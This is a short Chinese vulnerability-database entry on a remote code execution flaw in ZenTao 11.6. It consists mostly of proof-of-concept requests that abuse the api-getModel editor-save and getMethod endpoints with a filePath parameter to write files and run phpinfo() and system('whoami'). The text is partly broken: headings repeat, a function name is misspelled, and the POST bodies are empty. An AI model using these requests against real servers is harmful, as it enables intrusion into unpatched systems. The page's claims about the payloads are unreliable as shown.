禅道11.6RCE漏洞


title: ‘禅道11.6RCE漏洞’
date: Thu, 17 Sep 2020 01:55:17 +0000
draft: false
tags: [‘白阁-漏洞库’]

### 漏洞范围

禅道 11.6

### 漏洞POC

文件写入

### 漏洞范围

禅道 11.6

### 漏洞POC

## 三.远程代码执行漏洞

1)远程代码执行命令phpnifo();

Payload 1:

http://127.0.0.1/zentaopms/www/api-getModel-editor-save-filePath=1111

POST: fileContent=

![img](/static/baige/01-CMS漏洞/禅道/禅道11.6RCE漏洞/20200909170608141.png)

Payload2:

http://127.0.0.1/zentaopms/www/ api-getModel-api-getMethod-filePath=1111/1

POST: fileContent=

![img](/static/baige/01-CMS漏洞/禅道/禅道11.6RCE漏洞/20200909170608208.png)

“`
2)远程代码执行命令system(‘whoami’);
“`

Payload 1:

http://127.0.0.1/zentaopms/www/api-getModel-editor-save-filePath=2222

POST: fileContent=

![img](/static/baige/01-CMS漏洞/禅道/禅道11.6RCE漏洞/20200909170608153.png)

Payload 2:

http://127.0.0.1/zentaopms/www/ api-getModel-api-getMethod-filePath=2222/2

POST: fileContent=

![img](/static/baige/01-CMS漏洞/禅道/禅道11.6RCE漏洞/20200909170608326.png)

© 版权声明
THE END
喜欢就支持一下吧
点赞0赞赏 分享
评论 抢沙发

请登录后发表评论

    请登录后查看评论内容